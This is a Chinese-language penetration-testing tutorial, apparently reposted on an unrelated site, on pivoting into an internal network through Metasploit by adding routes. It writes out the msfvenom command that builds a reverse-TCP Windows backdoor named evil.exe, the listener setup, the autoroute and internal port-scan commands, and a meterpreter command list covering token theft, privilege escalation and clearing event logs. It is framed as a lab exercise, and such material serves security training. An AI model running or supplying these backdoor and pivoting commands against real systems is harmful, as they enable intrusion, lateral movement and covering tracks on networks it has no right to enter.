跳板攻击之: MSF 添加路由方式渗透内网-养老游戏专题-弘德养老游戏活动中心

跳板攻击之: MSF 添加路由方式渗透内网

目录跳板攻击之: MSF 添加路由方式渗透内网1 Metasploit 跳板攻击: 添加路由方式原理2 实验环境2.1 建立 meterpreter 反向连接2.2 查看当前系统信息2.3 利用增加的路由扫描新网段的主机3 meterpreter 基础命令

1 Metasploit 跳板攻击: 添加路由方式原理

通过网络层可达实现跳板攻击

缺点是利用环境苛刻，只能在 Metasploit 中使用。易被防火墙拦截流量。

2 实验环境

2.1 建立 meterpreter 反向连接

生成 Metaspolit 后门程序

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4444 -f exe > /var/www/html/evil.exe

kali 配置监听 meterpreter 反向连接

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.2

run

WEB Server 下载 Metaspolit 后门程序，并打开程序

meterpreter 反向连接建立成功

2.2 查看当前系统信息

查看当前系统路由信息，发现存在新网段：10.2.1.0/24

ipconfig

route list

添加去往该目标网段的路由

run post/multi/manage/autoroute

run autoroute -p

查看添加的路由，下一跳指向 session 1

2.3 利用增加的路由扫描新网段的主机

使用 MSF 端口扫描模块进行扫描

use auxiliary/scanner/portscan/tcp

set ports 135,139,445,23,80,8080

set rhosts 10.2.1.1-10.2.1.3

NMAP 扫描：由结果可知端口被防火墙过滤

db_nmap -sV -p23,80 10.2.1.3

# 如果扫描的款数据库未连接，需要先执行 msfdb init 后，再重新打开 msfconsole

3 meterpreter 基础命令

Stdapi: Networking Commands

===========================

Command Description

------- -----------

arp Display the host ARP cache

getproxy Display the current proxy configuration

ifconfig Display interfaces

ipconfig Display interfaces

netstat Display the network connections

portfwd Forward a local port to a remote service

resolve Resolve a set of host names on the target

route View and modify the routing table

Stdapi: System Commands

=======================

Command Description

------- -----------

clearev Clear the event log

drop_token Relinquishes any active impersonation token.

execute Execute a command

getenv Get one or more environment variable values

getpid Get the current process identifier

getprivs Attempt to enable all privileges available to the current process 尽可能提升权限

getsid Get the SID of the user that the server is running as

getuid Get the user that the server is running as 查看当前用户

kill Terminate a process

localtime Displays the target system local date and time

pgrep Filter processes by name

pkill Terminate processes by name

ps List running processes 列出进程

reboot Reboots the remote computer

reg Modify and interact with the remote registry

rev2self Calls RevertToSelf() on the remote machine

shell Drop into a system command shell

shutdown Shuts down the remote computer

steal_token Attempts to steal an impersonation token from the target process

suspend Suspends or resumes a list of processes

sysinfo Gets information about the remote system, such as OS 查看系统信息

migrate Migrate the server to another process 注入进程

getsystem Attempt to elevate your privilege to that of local system. 通过各种攻击向量来提升本地系统权限